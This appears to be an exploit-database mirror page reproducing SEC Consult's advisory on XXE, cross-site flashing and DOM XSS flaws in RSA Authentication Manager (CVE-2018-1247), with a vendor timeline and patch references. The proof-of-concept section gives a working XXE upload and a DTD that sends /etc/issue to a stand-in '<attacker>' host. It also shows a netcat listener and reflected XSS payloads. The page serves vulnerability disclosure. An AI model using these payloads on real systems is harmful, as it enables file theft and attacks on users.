Menu

Improved exploit search engine. Try it out

"RSA Authentication Manager 8.2.1.4.0-build1394922 / < 8.3 P1 - XML External Entity Injection / Cross-Site Flashing / DOM Cross-Site Scripting"

Author

"SEC Consult"

Platform

java

Release date

2018-05-16

Release Date Title Type Platform Author
2019-07-12 "Jenkins Dependency Graph View Plugin 0.13 - Persistent Cross-Site Scripting" webapps java "Ishaq Mohammed"
2019-07-12 "Sahi Pro 8.0.0 - Remote Command Execution" webapps java AkkuS
2019-06-17 "Spring Security OAuth - Open Redirector" webapps java Riemann
2019-06-04 "Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting" webapps java Vingroup
2019-06-04 "Zoho ManageEngine ServiceDesk Plus 9.3 - 'SearchN.do' Cross-Site Scripting" webapps java Vingroup
2019-06-04 "Zoho ManageEngine ServiceDesk Plus 9.3 - 'SolutionSearch.do' Cross-Site Scripting" webapps java Vingroup
2019-06-04 "Zoho ManageEngine ServiceDesk Plus 9.3 - 'SiteLookup.do' Cross-Site Scripting" webapps java Vingroup
2019-05-29 "Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)" remote java Metasploit
2019-05-21 "Brocade Network Advisor 14.4.1 - Unauthenticated Remote Code Execution" webapps java "Jakub Palaczynski"
2019-05-21 "Oracle CTI Web Service - 'EBS_ASSET_HISTORY_OPERATIONS' XML Entity Injection" webapps java omurugur
2019-04-30 "Spring Cloud Config 2.1.x - Path Traversal (Metasploit)" webapps java "Dhiraj Mishra"
2019-04-26 "Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting" webapps java "Dhiraj Mishra"
2019-04-08 "ManageEngine ServiceDesk Plus 9.3 - User Enumeration" webapps java "Alexander Bluestein"
2019-03-19 "Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit)" remote java Metasploit
2016-12-20 "Java Debug Wire Protocol (JDWP) - Remote Code Execution" remote java IOactive
2019-02-25 "Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 - Remote Code Execution" webapps java wetw0rk
2019-02-19 "Jenkins - Remote Code Execution" webapps java orange
2019-02-18 "Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in AlternateSubstitutionSubtable::process" dos java "Google Security Research"
2019-02-18 "Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in ExtractBitMap_blocClass" dos java "Google Security Research"
2019-02-18 "Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in OpenTypeLayoutEngine::adjustGlyphPositions" dos java "Google Security Research"
2019-02-18 "Oracle Java Runtime Environment - Heap Out-of-Bounds Read During OTF Font Rendering in glyph_CloseContour" dos java "Google Security Research"
2019-02-05 "OpenMRS Platform < 2.24.0 - Insecure Object Deserialization" webapps java "Bishop Fox"
2019-01-28 "Rundeck Community Edition < 3.0.13 - Persistent Cross-Site Scripting" webapps java "Ishaq Mohammed"
2018-11-30 "Apache Spark - Unauthenticated Command Execution (Metasploit)" remote java Metasploit
2018-11-14 "Atlassian Jira - Authenticated Upload Code Execution (Metasploit)" remote java Metasploit
2018-10-24 "Apache OFBiz 16.11.04 - XML External Entity Injection" webapps java "Jamie Parfet"
2018-10-22 "Oracle Siebel CRM 8.1.1 - CSV Injection" webapps java "Sarath Nair"
2018-10-01 "ManageEngine AssetExplorer 6.2.0 - Cross-Site Scripting" webapps java "Ismail Tasdelen"
2018-10-01 "H2 Database 1.4.196 - Remote Code Execution" webapps java h4ckNinja
2018-09-27 "ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting" webapps java "Ismail Tasdelen"
Release Date Title Type Platform Author
2019-05-13 "OpenProject 5.0.0 - 8.3.1 - SQL Injection" webapps php "SEC Consult"
2018-08-16 "Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery" webapps php "SEC Consult"
2018-07-13 "Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure" webapps php "SEC Consult"
2018-07-13 "WAGO e!DISPLAY 7300T - Multiple Vulnerabilities" webapps php "SEC Consult"
2018-07-05 "ADB Broadband Gateways / Routers - Authorization Bypass" webapps hardware "SEC Consult"
2018-05-16 "RSA Authentication Manager 8.2.1.4.0-build1394922 / < 8.3 P1 - XML External Entity Injection / Cross-Site Flashing / DOM Cross-Site Scripting" webapps java "SEC Consult"
2018-04-24 "WSO2 Carbon / WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting" webapps java "SEC Consult"
2018-03-13 "SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities" webapps aspx "SEC Consult"
2018-03-05 "ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection" webapps php "SEC Consult"
2017-12-07 "OpenEMR 5.0.0 - OS Command Injection / Cross-Site Scripting" webapps php "SEC Consult"
2017-10-18 "Afian AB FileRun 2017.03.18 - Multiple Vulnerabilities" webapps php "SEC Consult"
2017-10-18 "Linksys E Series - Multiple Vulnerabilities" webapps cgi "SEC Consult"
2017-05-09 "I_ Librarian 4.6/4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting" webapps php "SEC Consult"
2017-03-22 "Solare Datensysteme Solar-Log Devices 2.8.4-56/3.5.2-85 - Multiple Vulnerabilities" webapps hardware "SEC Consult"
2017-03-08 "Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery" webapps multiple "SEC Consult"
2017-03-01 "Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting" webapps xml "SEC Consult"
2016-10-11 "RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection" webapps xml "SEC Consult"
2016-07-25 "Micro Focus Filr 2 2.0.0.421/1.2 1.2.0.846 - Multiple Vulnerabilities" webapps java "SEC Consult"
2016-02-10 "Yeager CMS 1.2.1 - Multiple Vulnerabilities" webapps php "SEC Consult"
2015-12-10 "Skybox Platform < 7.0.611 - Multiple Vulnerabilities" webapps hardware "SEC Consult"
2015-06-30 "Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities" webapps hardware "SEC Consult"
2015-01-26 "Symantec Data Center Security - Multiple Vulnerabilities" webapps multiple "SEC Consult"
2015-01-14 "Ansible Tower 2.0.2 - Multiple Vulnerabilities" webapps multiple "SEC Consult"
2014-12-23 "NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities" webapps jsp "SEC Consult"
2014-11-06 "Symantec Endpoint Protection 12.1.4023.4080 - Multiple Vulnerabilities" webapps jsp "SEC Consult"
2014-07-16 "BitDefender GravityZone 5.1.5.386 - Multiple Vulnerabilities" webapps linux "SEC Consult"
2014-07-14 "Shopizer 1.1.5 - Multiple Vulnerabilities" webapps php "SEC Consult"
2014-07-01 "IBM Algorithmics RICOS 4.5.0 < 4.7.0 - Multiple Vulnerabilities" webapps jsp "SEC Consult"
2014-06-09 "WebTitan 4.01 (Build 68) - Multiple Vulnerabilities" webapps php "SEC Consult"
2014-04-24 "WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion" webapps php "SEC Consult"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/44634/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/44634/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/44634/39742/rsa-authentication-manager-82140-build1394922-83-p1-xml-external-entity-injection-cross-site-flashing-dom-cross-site-scripting/download/", "exploit_id": "44634", "exploit_description": "\"RSA Authentication Manager 8.2.1.4.0-build1394922 / < 8.3 P1 - XML External Entity Injection / Cross-Site Flashing / DOM Cross-Site Scripting\"", "exploit_date": "2018-05-16", "exploit_author": "\"SEC Consult\"", "exploit_type": "webapps", "exploit_platform": "java", "exploit_port": null}
                                            

For full documentation follow the link above

blog comments powered by Disqus

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
SEC Consult Vulnerability Lab Security Advisory < 20180516-0 >
=======================================================================
              title: XXE & XSS vulnerabilities
            product: RSA Authentication Manager
 vulnerable version: 8.2.1.4.0-build1394922, < 8.3 P1
      fixed version: 8.3 P1 and later
         CVE number: CVE-2018-1247
             impact: High
           homepage: https://www.rsa.com
              found: 2017-11-16
                 by: Mantas Juskauskas (Office Vilnius)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"RSA provides more than 30,000 customers around the world with the essential
security capabilities to protect their most valuable assets from cyber
threats. With RSA's award-winning products, organizations effectively detect,
investigate, and respond to advanced attacks; confirm and manage identities;
and ultimately, reduce IP theft, fraud, and cybercrime."

Source: https://www.rsa.com/en-us/company/about


Business recommendation:
------------------------
By exploiting the vulnerabilities documented in this advisory an attacker can
obtain sensitive information from the RSA Authentication Manager file system,
initiate arbitrary TCP connections or cause DoS. In addition to this, clients
of the RSA Authentication manager can be affected by exploiting client-side
issues.

SEC Consult recommends to apply the available patches from the vendor.


Vulnerability overview/description:
-----------------------------------
1) XML External Entity Injection (XXE) (CVE-2018-1247)
The used XML parser is resolving XML external entities which allows an
authenticated attacker (or an attacker that is able to trick an authenticated
user into importing malicious XML files) to read files, send requests to
systems on the internal network (e.g port scanning) or cause a DoS (e.g.
billion laughs attack).
This issue has been fixed by RSA as described in the advisory DSA-2018-086.
(http://seclists.org/fulldisclosure/2018/May/18)


2) Cross-site Flashing
The vulnerable flash file does not filter or escape the user input
sufficiently. This leads to a reflected cross-site scripting vulnerability.
With reflected cross-site scripting, an attacker can inject arbitrary HTML or
JavaScript code into the victim's web browser. Once the victim clicks a
malicious link the attacker's code is executed in the context of the victim's
web browser.

The vulnerability exists in a third party component called pmfso.
This issue has been fixed by RSA as described in the advisory DSA-2018-082.


3) DOM based Cross-site Scripting
Several client-side scripts handle user supplied data with insufficient
validation before storing it in the DOM. This issue can be exploited to cause
reflected cross-site scripting.

The identified issues exist in third party components. One of the affected
components is PopCalendarX which has an assigned CVE (CVE-2017-9072).
This issue has been fixed by RSA as described in the advisory DSA-2018-082.

Two further issues affecting other third party components are not yet fixed,
as the third party vendor did not supply a patch to RSA yet.


Proof of concept:
-----------------
1) XML External Entity Injection (XXE) (CVE-2018-1247)

The Security Console of the RSA Authentication Manager allows authenticated
users to import SecurID Token jobs in XML format. By importing an XML file
with malicious XML code to the application, it is possible to exploit a blind
XXE vulnerability within the application.

For example, in order to read arbitrary files from the RSA Authentication
Manager OS, the following malicious XML file can be imported via the affected
endpoint:
==========================================================================================
POST /console-ims/ImportTokenJob.do?ptoken=[snip] HTTP/1.1
Host: <host>:7004
Cookie: [snip]

[snip]

-----------------------------9721941626073
Content-Disposition: form-data; name="textImportFileName.theFile";
filename="xxe_test.xml"
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo SYSTEM "http://<attacker>/a.dtd">
<key>
&e1;
</key>
-----------------------------9721941626073
Content-Disposition: form-data; name="textImportFileName.uploadResult"

[snip]

==========================================================================================

In this case, the attacker has to host the defined a.dtd file in the web root
of a controlled web server:
==========================================================================================
# cat /var/www/a.dtd
<!ENTITY % p1 SYSTEM "file:///etc/issue">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://<attacker>:8080/%p1;'>">
%p2;
==========================================================================================

Assuming that the RSA Authentication Manager OS has network level access to
the TCP port 80 and 8080 of the attacker controlled IP address, as soon as the
malicious XML file gets uploaded and parsed, the contents of the /etc/issue
file (as an example) are leaked to a remote listener controlled by the attacker:
==========================================================================================
# nc -nlvp 8080
listening on [any] 8080 ...
connect to [<attacker>] from (UNKNOWN) [<host>] 32817
GET /RSA%20Authentication%20Manager%208.2.1.4.0-build1394922 HTTP/1.1
==========================================================================================

Similarly, contents of other internal files can be obtained from the affected
system with current service user permissions.


2) Cross-site Flashing
The issue affects a third party component pmfso (DSA-2018-082).
To exploit a reflected cross-site scripting via the vulnerable SWF Flash file
it is sufficient to click the following URL:

https://<host>:7004//IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert("Cross-site_Scripting")//


3) DOM based Cross-site Scripting

Example 1:
The issue affects a third party component PopCalendarX (CVE-2017-9072).
To exploit DOM based reflected cross-site scripting it is enough to trick a
victim into executing the following JavaScript (e.g. by clicking on a
specially crafted link):
==========================================================================================
<script>
window.name = "gToday:#' onload='alert(document.domain)' ";
location.href = "https://<host>:7004/IMS-AA-IDP/common/scripts/calendar/ipopeng.htm";
</script>

==========================================================================================

Example 2:
Proof of concept has been removed. The issue affects another third party
component. The fix has not been issued by the third party vendor so far.

Example 3:
Proof of concept has been removed. The issue affects another third party
component. The fix has not been issued by the third party vendor so far.


Vulnerable / tested versions:
-----------------------------
The identified vulnerabilities have been verified to exist in the
RSA Authentication Manager, version 8.2.1.4.0-build1394922 which was the latest
version available during the test.


Vendor contact timeline:
------------------------
2017-11-23: Contacting vendor through security_alert@emc.com
2017-11-24: Vendor confirms the information was received, forwards it
            to the responsible team for investigation and assigns tickets.
2017-12-08: Vendor acknowledges all reported issues as valid. Remediation
            plan is being determined.
2018-01-04: Contacting vendor for a status update.
2018-01-04: Vendor provides a possible fix date.
2018-02-21: Vendor provides a status update regarding the fix release date.
2018-04-24: Vendor contacts for credit text approval.
2018-05-08: Contacting vendor for the reason of uncoordinated public
            release and status information
2018-05-08: Vendor provides an update regarding their public release and
            status of vulnerabilities not included in the release, vendor info:
            * DSA-2018-086 (http://seclists.org/fulldisclosure/2018/May/18)
              was released on 5/4
            * DSA-2018-082 (https://community.rsa.com/docs/DOC-92083)
              was released on 5/3
2018-05-16: Security advisory release


Solution:
---------
The vendor has released an advisory that contains recommendations of how to
resolve the reported XML External Entity Injection Vulnerability:
DSA-2018-086 - https://community.rsa.com/docs/DOC-92085 - (RSA Link Sign On Required)

Full Disclosure archive:
http://seclists.org/fulldisclosure/2018/May/18

Note: the suggested resolution also provides a fix for the Cross-site Flashing
and DOM based Cross-site Scripting (only Example 1) issues provided in the
descriptions above.


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF M. Juskauskas / @2018